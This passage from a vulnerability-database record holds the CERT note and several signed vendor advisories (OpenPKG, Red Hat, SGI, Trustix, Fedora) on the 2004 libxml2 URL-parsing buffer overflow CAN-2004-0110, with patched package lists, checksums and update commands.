\nsecurity_linux-mandrake.com \n \nType Bits/KeyID Date User ID \npub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team \n<security linux-mandrake.com> \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.7 (GNU/Linux) \n \niD8DBQFARrVQmqjQ0CJFipgRApmfAKDAmU1wWFUMOt0zdBXMK5B3TnbFiQCgtUPf \nZHaFx48BQTxaJG6ZbwDG/0E= \n=Tz/7 \n-----END PGP SIGNATURE-----`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23493966 Feedback>).\n\n### OpenPKG __ Affected\n\nUpdated: March 09, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see <http://www.openpkg.org/security/OpenPKG-SA-2004.003-libxml.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n________________________________________________________________________ \n \nOpenPKG Security Advisory The OpenPKG Project \n``<http://www.openpkg.org/security.html>`` ``<http://www.openpkg.org>`` \nopenpkg-security@openpkg.org openpkg@openpkg.org \nOpenPKG-SA-2004.003 05-Mar-2004 \n________________________________________________________________________ \n \nPackage: libxml \nVulnerability: arbitrary code execution \nOpenPKG Specific: no \n \nAffected Releases: Affected Packages: Corrected Packages: \nOpenPKG CURRENT <= libxml-2.6.5-20040126 >= libxml-2.6.6-20040212 \nOpenPKG 2.0 none N.A. \nOpenPKG 1.3 <= libxml-2.5.8-1.3.0 >= libxml-2.5.8-1.3.1 \n \nAffected Releases: Dependent Packages: \nOpenPKG CURRENT apache::with_mod_php_dom perl-xml::with_libxml \nphp::with_dom php5::with_xml php5::with_dom cadaver \ndia kde-libs libgdome libglade libwmf libxslt \nneon pan ripe-dbase roadrunner scli scrollkeeper \nsitecopy subversion wv xmlsec xmlstarlet xmlto xmms \nOpenPKG 1.3 apache::with_mod_php_dom perl-xml::with_libxml \nphp::with_dom libgdome libwmf libxslt neon sitecopy \nxmlsec \n \nDescription: \nA flaw in the HTTP and FTP client sub-library of libxml2 [0] \nfound by Yuuichi Teranishi can be exploited to cause a buffer \noverflow if passed a very long URL [1]. This could be used by \nan attacker to execute arbitrary code on the host computer. The \nCommon Vulnerabilities and Exposures (CVE) project assigned the id \nCAN-2004-0110 [2] to the problem. \n \nPlease check whether you are affected by running \"<prefix>/bin/rpm -q \nlibxml\". If you have the \"libxml\" package installed and its version \nis affected (see above), we recommend that you immediately upgrade it \n(see solution) and any dependent packages (see above). [3][4] \n \nSolution: \nSelect the updated source RPM appropriate for your OpenPKG release \n[5], fetch it from the OpenPKG FTP service [6] or a mirror location, \nverify its integrity [7], build a corresponding binary RPM from it [3] \nand update your OpenPKG installation by applying the binary RPM [4]. \nFor the affected release OpenPKG 1.3, perform the following operations \nto permanently fix the security problem (for other releases adjust \naccordingly). \n \n$ ftp ftp.openpkg.org \nftp> bin \nftp> cd release/1.3/UPD \nftp> get libxml-2.5.8-1.3.1.src.rpm \nftp> bye \n$ <prefix>/bin/rpm -v --checksig libxml-2.5.8-1.3.1.src.rpm \n$ <prefix>/bin/rpm --rebuild libxml-2.5.8-1.3.1.src.rpm \n$ su - \n# <prefix>/bin/rpm -Fvh <prefix>/RPM/PKG/libxml-2.5.8-1.3.1.*.rpm \n \nAdditionally, we recommend that you rebuild and reinstall \nall dependent packages (see above), if any, too. [3][4] \n________________________________________________________________________ \n \nReferences: \n[0] ``<http://xmlsoft.org/>`` \n[1] ``<http://xmlsoft.org/news.html>`` \n[2] ``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-0110>`` \n[3] ``<http://www.openpkg.org/tutorial.html#regular-source>`` \n[4] ``<http://www.openpkg.org/tutorial.html#regular-binary>`` \n[5] ``<ftp://ftp.openpkg.org/release/1.3/UPD/libxml-2.5.8-1.3.1.src.rpm>`` \n[6] ``<ftp://ftp.openpkg.org/release/1.3/UPD/>`` \n[7] ``<http://www.openpkg.org/security.html#signature>`` \n________________________________________________________________________ \n \nFor security reasons, this advisory was digitally signed with the \nOpenPGP public key \"OpenPKG <openpkg@openpkg.org>\" (ID 63C4CB9F) of the \nOpenPKG project which you can retrieve from ``<http://pgp.openpkg.org>`` and \nhkp://pgp.openpkg.org. Follow the instructions on ``<http://pgp.openpkg.org/>`` \nfor details on how to verify the integrity of this advisory. \n________________________________________________________________________ \n \n-----BEGIN PGP SIGNATURE----- \nComment: OpenPKG <openpkg@openpkg.org> \n \niD8DBQFASLo3gHWT4GPEy58RAr+bAKDII0jb/BQ94576qHt2KDt7akiqEwCg2aUT \nIuYPKcQCRD4xwJbjDNj9QHs= \n=zN3S \n-----END PGP SIGNATURE-----`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23493966 Feedback>).\n\n### Red Hat Inc. __ Affected\n\nUpdated: March 09, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see <https://rhn.redhat.com/errata/RHSA-2004-090.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n\\-----BEGIN PGP SIGNED MESSAGE-----\n\nHash: SHA1 \n \n\\- --------------------------------------------------------------------- \nRed Hat Security Advisory \n \nSynopsis: Updated libxml2 packages fix security vulnerability \nAdvisory ID: RHSA-2004:091-02 \nIssue date: 2004-03-03 \nUpdated on: 2004-03-03 \nProduct: Red Hat Linux \nKeywords: \nCross references: \nObsoletes: \nCVE Names: CAN-2004-0110 \n\\- --------------------------------------------------------------------- \n \n1\\. Topic: \n \nUpdated libxml2 packages that fix an overflow when parsing remote resources \nare now available. \n \n[Updated 3 March 2004] \nRevised libxml2 packages are now available as the original packages did not \ncontain a complete patch. \n \n2\\. Relevant releases/architectures: \n \nRed Hat Linux 9 - i386 \n \n3\\. Problem description: \n \nlibxml2 is a library for manipulating XML files. \n \nYuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6. \nWhen fetching a remote resource via FTP or HTTP, libxml2 uses special \nparsing routines. These routines can overflow a buffer if passed a very \nlong URL. If an attacker is able to find an application using libxml2 that \nparses remote resources and allows them to influence the URL, then this \nflaw could be used to execute arbitrary code. The Common Vulnerabilities \nand Exposures project (cve.mitre.org) has assigned the name CAN-2004-0110 \nto this issue. \n \nAll users are advised to upgrade to these updated packages, which contain a \nbackported fix and are not vulnerable to this issue. \n \n4\\. Solution: \n \nBefore applying this update, make sure all previously released errata \nrelevant to your system have been applied. \n \nTo update all RPMs for your particular architecture, run: \n \nrpm -Fvh [filenames] \n \nwhere [filenames] is a list of the RPMs you wish to upgrade. Only those \nRPMs which are currently installed will be updated. Those RPMs which are \nnot installed but included in the list will not be updated. Note that you \ncan also use wildcards (*.rpm) if your current directory *only* contains the \ndesired RPMs. \n \nPlease note that this update is also available via Red Hat Network. Many \npeople find this an easier way to apply updates. To use Red Hat Network, \nlaunch the Red Hat Update Agent with the following command: \n \nup2date \n \nThis will start an interactive process that will result in the appropriate \nRPMs being upgraded on your system. \n \nIf up2date fails to connect to Red Hat Network due to SSL \nCertificate Errors, you need to install a version of the \nup2date client with an updated certificate. The latest version of \nup2date is available from the Red Hat FTP site and may also be \ndownloaded directly from the RHN website: \n \n_<https://rhn.redhat.com/help/latest-up2date.pxt>_ \n \n5\\. RPMs required: \n \nRed Hat Linux 9: \n \nSRPMS: \n_<ftp://updates.redhat.com/9/en/os/SRPMS/libxml2-2.5.4-3.rh9.src.rpm>_ \n \ni386: \n_<ftp://updates.redhat.com/9/en/os/i386/libxml2-2.5.4-3.rh9.i386.rpm>_ \n_<ftp://updates.redhat.com/9/en/os/i386/libxml2-devel-2.5.4-3.rh9.i386.rpm>_ \n_<ftp://updates.redhat.com/9/en/os/i386/libxml2-python-2.5.4-3.rh9.i386.rpm>_ \n \n \n \n6\\. Verification: \n \nMD5 sum Package Name \n\\- -------------------------------------------------------------------------- \n \ncb550a537cbc60b95dcc4396ab419466 9/en/os/SRPMS/libxml2-2.5.4-3.rh9.src.rpm \nb063360d9efb8f4de082f1324fdcd421 9/en/os/i386/libxml2-2.5.4-3.rh9.i386.rpm \n8590c8fcd8268d3b682531a4428f14f8 9/en/os/i386/libxml2-devel-2.5.4-3.rh9.i386.rpm \nd34886934ad6c00607e0117815bc1e0a 9/en/os/i386/libxml2-python-2.5.4-3.rh9.i386.rpm \n \nThese packages are GPG signed by Red Hat for security. Our key is \navailable from _<https://www.redhat.com/security/keys.html>_ \n \nYou can verify each package with the following command: \n \nrpm --checksig -v <filename> \n \nIf you only wish to verify that each package has not been corrupted or \ntampered with, examine only the md5sum with the following command: \n \nmd5sum <filename> \n \n \n7\\. References: \n \n_<http://mail.gnome.org/archives/xml/2004-February/msg00070.html>_ \n_<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0110>_ \n \n8\\. Contact: \n \nThe Red Hat security contact is <secalert@redhat.com>. More contact \ndetails at _<https://www.redhat.com/solutions/security/news/contact.html>_ \n \nCopyright 2003 Red Hat, Inc. \n\\-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.7 (GNU/Linux) \n \niD8DBQFARdnpXlSAg2UNWIIRAtbLAJwKtHXbxKmYMXH+ijc1U1tdDyh4OQCglW2U \ncVDJ2zxOZzZgjfNOV0z3fIU= \n=zsb2 \n\\-----END PGP SIGNATURE-----\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23493966 Feedback>).\n\n### SGI __ Affected\n\nUpdated: March 09, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see <ftp://patches.sgi.com/support/free/security/advisories/20040301-01-U.asc>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n \n____________________________________________________________________________ \nSGI Security Advisory \n \nTitle : SGI Advanced Linux Environment security update #13 \nNumber : 20040301-01-U \nDate : March 3, 2004 \nReference : Redhat Advisory RHSA-2004:090-06, CAN-2004-0110 \nReference : Redhat Advisory RHSA-2004:058-08, CAN-2003-0973 \nFixed in : Patch 10056 for SGI ProPack v2.4 and SGI ProPack v2.3 \n______________________________________________________________________________ \n \nSGI provides this information freely to the SGI user community for its \nconsideration, interpretation, implementation and use. SGI recommends that \nthis information be acted upon as soon as possible. \n \nSGI provides the information in this Security Advisory on an \"AS-IS\" basis \nonly, and disclaims all warranties with respect thereto, express, implied \nor otherwise, including, without limitation, any warranty of merchantability \nor fitness for a particular purpose. In no event shall SGI be liable for \nany loss of profits, loss of business, loss of data or for any indirect, \nspecial, exemplary, incidental or consequential damages of any kind arising \nfrom your use of, failure to use or improper use of any of the instructions \nor information in this Security Advisory. \n______________________________________________________________________________ \n \n- -------------- \n- --- Update --- \n- -------------- \n \nSGI has released Patch 10056: SGI Advanced Linux Environment security \nupdate #13, which includes updated RPMs for SGI ProPack v2.4 and SGI \nProPack v2.3 for the SGI Altix family of systems, in response to the \nfollowing security issues: \n \nUpdated mod_python packages fix denial of service vulnerability \n``<http://rhn.redhat.com/errata/RHSA-2004-058.html>`` \n \nUpdated libxml2 packages fix security vulnerability \n``<http://rhn.redhat.com/errata/RHSA-2004-090.html>`` \n \nPatch 10056 is available from ``<http://support.sgi.com/>`` and \n``<ftp://patches.sgi.com/support/free/security/patches/ProPack/2.3/>`` \n``<ftp://patches.sgi.com/support/free/security/patches/ProPack/2.4/>`` \n \nThe individual RPMs from Patch 10056 are available from: \n``<ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/RPMS>`` \n``<ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/SRPMS>`` \n``<ftp://oss.sgi.com/projects/sgi_propack/download/2.4/updates/RPMS>`` \n``<ftp://oss.sgi.com/projects/sgi_propack/download/2.4/updates/SRPMS>`` \n \nNote: Four weeks after the release of SGI ProPack v2.4, \nweekly security updates for SGI ProPack v2.3 will discontinue. \nPlease upgrade to SGI ProPack v2.4 as soon as possible. \nSee the SGI ProPack Support Policy on ``<http://support.sgi.com/>`` \nfor additional information. \n \n \n- ------------- \n- --- Links --- \n- ------------- \n \nSGI Security Advisories can be found at: \n``<http://www.sgi.com/support/security/>`` and \n``<ftp://patches.sgi.com/support/free/security/advisories/>`` \n \nRed Hat Errata: Security Alerts, Bugfixes, and Enhancements \n``<http://www.redhat.com/apps/support/errata/>`` \n \nSGI Advanced Linux Environment security updates can found on: \n``<ftp://oss.sgi.com/projects/sgi_propack/download/>`` \n \nSGI patches can be found at the following patch servers: \n``<http://support.sgi.com/>`` \n \nThe primary SGI anonymous FTP site for security advisories and \nsecurity patches is ``<ftp://patches.sgi.com/support/free/security/>`` \n \n \n- ----------------------------------------- \n- --- SGI Security Information/Contacts --- \n- ----------------------------------------- \n \nIf there are questions about this document, email can be sent to \nsecurity-info@sgi.com. \n \n------oOo------ \n \nSGI provides security information and patches for use by the entire SGI \ncommunity. This information is freely available to any person needing the \ninformation and is available via anonymous FTP and the Web. \n \nThe primary SGI anonymous FTP site for security advisories and patches is \npatches.sgi.com. Security advisories and patches are located under the URL \n``<ftp://patches.sgi.com/support/free/security/>`` \n \nThe SGI Security Headquarters Web page is accessible at the URL: \n``<http://www.sgi.com/support/security/>`` \n \nFor issues with the patches on the FTP sites, email can be sent to \nsecurity-info@sgi.com. \n \nFor assistance obtaining or working with security patches, please \ncontact your SGI support provider. \n \n------oOo------ \n \nSGI provides a free security mailing list service called wiretap and \nencourages interested parties to self-subscribe to receive (via email) all \nSGI Security Advisories when they are released. Subscribing to the mailing \nlist can be done via the Web \n(``<http://www.sgi.com/support/security/wiretap.html>``) or by sending email to \nSGI as outlined below. \n \n% mail wiretap-request@sgi.com \nsubscribe wiretap < YourEmailAddress such as midwatch@sgi.com > \nend \n^d \n \nIn the example above, <YourEmailAddress> is the email address that you wish \nthe mailing list information sent to. The word end must be on a separate \nline to indicate the end of the body of the message. The control-d (^d) is \nused to indicate to the mail program that you are finished composing the \nmail message. \n \n \n------oOo------ \n \nSGI provides a comprehensive customer World Wide Web site. This site is \nlocated at ``<http://www.sgi.com/support/security/>`` . \n \n------oOo------ \n \nIf there are general security questions on SGI systems, email can be sent to \nsecurity-info@sgi.com. \n \nFor reporting *NEW* SGI security issues, email can be sent to \nsecurity-alert@sgi.com or contact your SGI support provider. A support \ncontract is not required for submitting a security report. \n \n______________________________________________________________________________ \nThis information is provided freely to all interested parties \nand may be redistributed provided that it is not altered in any \nway, SGI is appropriately credited and the document retains and \nincludes its valid PGP signature. \n \n-----BEGIN PGP SIGNATURE----- \nVersion: 2.6.2 \n \niQCVAwUBQEZc7rQ4cFApAP75AQGbfgP9EVFvHOutQopidet9Q3H1lw4tbpIzqgt1 \n1MeA6n3rfDYDe1pQLw1jLb1Exlp8iEFzBerbe0Lxen+zEAlRdUi1wL9NCnyo89Ro \nD6B8+KNvgibtERzcf9y7NgHU8fTDxPjcmegQMl3Nst3/6zYwy3NNUFPIXTfnAySe \nX1ERZhNMqSk= \n=4964 \n-----END PGP SIGNATURE-----`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23493966 Feedback>).\n\n### Trustix Secure Linux __ Affected\n\nUpdated: March 09, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see <http://www.trustix.org/errata/misc/2004/TSL-2004-0010-libxml2.asc.txt>[](<http://www.trustix.org/errata/misc/2004/TSL-2004-0010-libxml2.asc.txt>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n\\-----BEGIN PGP SIGNED MESSAGE-----\n\nHash: SHA1 \n \n\\- -------------------------------------------------------------------------- \nTrustix Secure Linux Security Advisory #2004-0010 \n \nPackage name: libxml2 \nSummary: buffer overrun in nanohttp \nDate: 2004-03-05 \nAffected versions: Trustix 2.0 \n \n\\- -------------------------------------------------------------------------- \nPackage description: \nThis library allows to manipulate XML files. It includes support \nto read, modify and write XML and HTML files. \n \nProblem description: \nURLs longer than 4096 bytes would cause an overflow while using nanohttp \nin libxml2. \n \nAction: \nWe recommend that all systems with this package installed be upgraded. \nPlease note that if you do not need the functionality provided by this \npackage, you may want to remove it from your system. \n \n \nLocation: \nAll Trustix updates are available from \n<URI:<http://http.trustix.org/pub/trustix/updates/>> \n<URI:<ftp://ftp.trustix.org/pub/trustix/updates/>> \n \n \nAbout Trustix Secure Linux: \nTrustix Secure Linux is a small Linux distribution for servers. With focus \non security and stability, the system is painlessly kept safe and up to \ndate from day one using swup, the automated software updater. \n \n \nAutomatic updates: \nUsers of the SWUP tool can enjoy having updates automatically \ninstalled using 'swup --upgrade'. \n \n \nPublic testing: \nMost updates for Trustix are made available for public testing some time \nbefore release. \nIf you want to contribute by testing the various packages in the \ntesting tree, please feel free to share your findings on the \ntsl-discuss mailinglist. \nThe testing tree is located at \n<URI:<http://tsldev.trustix.org/cloud/>> \n \nYou may also use swup for public testing of updates: \n \nsite { \nclass = 0 \nlocation = \"_<http://tsldev.trustix.org/cloud/rdfs/latest.rdf>_\" \nregexp = \".*\" \n} \n \n \nQuestions? \nCheck out our mailing lists: \n<URI:<http://www.trustix.org/support/>> \n \n \nVerification: \nThis advisory along with all Trustix packages are signed with the \nTSL sign key. \nThis key is available from: \n<URI:<http://www.trustix.org/TSL-SIGN-KEY>> \n \nThe advisory itself is available from the errata pages at \n<URI:<http://www.trustix.org/errata/trustix-2.0/>> \nor directly at \n<URI:<http://www.trustix.org/errata/misc/2004/TSL-2004-0010-libxml2.asc.txt>> \n \n \nMD5sums of the packages: \n\\- -------------------------------------------------------------------------- \n13066c223f0c3148eb69cfd399ea3f14 2.0/rpms/libxml2-2.5.10-1tr.i586.rpm \nb0a80332a30d823552dc99a13ffbf689 2.0/rpms/libxml2-devel-2.5.10-1tr.i586.rpm \nf58ec53e75a663aee96b7e472d01874f 2.0/rpms/libxml2-python-2.5.10-1tr.i586.rpm \n2a048d808097e162648d7f31f6c0ada5 2.0/srpms/libxml2-2.5.10-1tr.src.rpm \n\\- -------------------------------------------------------------------------- \n \n \nTrustix Security Team \n \n\\-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.2 (GNU/Linux) \n \niD8DBQFASK8Ei8CEzsK9IksRAlmZAKC6aFKwT15n2LKkY7H1JGSFRWD8ywCdHGGE \nGJx7SovoxEdiZWCV6Jy1bKc= \n=fzDy \n\\-----END PGP SIGNATURE-----\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23493966 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://mail.gnome.org/archives/xml/2004-February/msg00070.html>\n * <http://www.gnome.org/softwaremap/projects/libxml>\n * <http://www.xmlsoft.org/news.html>\n * <http://www.xmlsoft.org/downloads.html>\n * <http://secunia.com/advisories/10958/>\n * <http://www.securityfocus.com/bid/9718>\n * <http://xforce.iss.net/xforce/xfdb/15301>\n * <http://xforce.iss.net/xforce/xfdb/15302>\n * <http://www.ciac.org/ciac/bulletins/o-086.shtml>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0110>\n\n### Acknowledgements\n\nThanks to Yuuichi Teranishi for finding this vulnerability.\n\nThis document was written by Jeffrey S. Havrilla.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2004-0110](<http://web.nvd.nist.gov/vuln/detail/CVE-2004-0110>) \n---|--- \n**Date Public:** | 2004-02-12 \n**Date First Published:** | 2004-03-09 \n**Date Last Updated: ** | 2004-03-09 20:04 UTC \n**Document Revision: ** | 9 \n", "modified": "2004-03-09T20:04:00", "published": "2004-03-09T00:00:00", "id": "VU:493966", "href": "https://www.kb.cert.org/vuls/id/493966", "type": "cert", "title": "Libxml2 URI parsing errors in nanohttp and nanoftp", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0110", "CVE-2004-0989", "CVE-2009-2414", "CVE-2009-2416"], "description": "This library allows old Gnome-1 applications to manipulate XML files. ", "modified": "2009-08-15T08:18:18", "published": "2009-08-15T08:18:18", "id": "FEDORA:9E4C010F868", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: libxml-1.8.17-24.fc11", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0110", "CVE-2004-0989", "CVE-2009-2414", "CVE-2009-2416"], "description": "This library allows old Gnome-1 applications to manipulate XML files. ", "modified": "2009-08-15T08:20:49", "published": "2009-08-15T08:20:49", "id": "FEDORA:12C9F10F85B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: libxml-1.8.17-24.fc10", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
